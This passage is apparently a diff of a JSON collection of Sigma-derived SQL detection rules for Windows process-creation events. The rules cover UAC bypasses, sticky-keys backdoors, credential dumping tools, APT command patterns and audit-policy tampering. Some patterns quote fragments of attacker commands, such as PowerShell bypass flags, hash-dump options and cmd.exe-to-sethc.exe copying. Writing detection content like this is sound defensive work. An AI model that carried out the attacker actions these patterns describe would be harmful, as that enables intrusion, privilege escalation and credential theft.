AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR 
CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% \"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND 
CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_susp_execution_path.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen 
the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": 
"Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects the execution of 
msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": 
"Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "status": "experimental", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", - "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "status": "test", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution" + "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Unknown sub processes of Wsreset.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "status": "test", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' 
--dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Programs that use the same command line flags" + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - 
"attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "status": "test", + "description": "Detects a command used by conti to dump database", + 
"author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
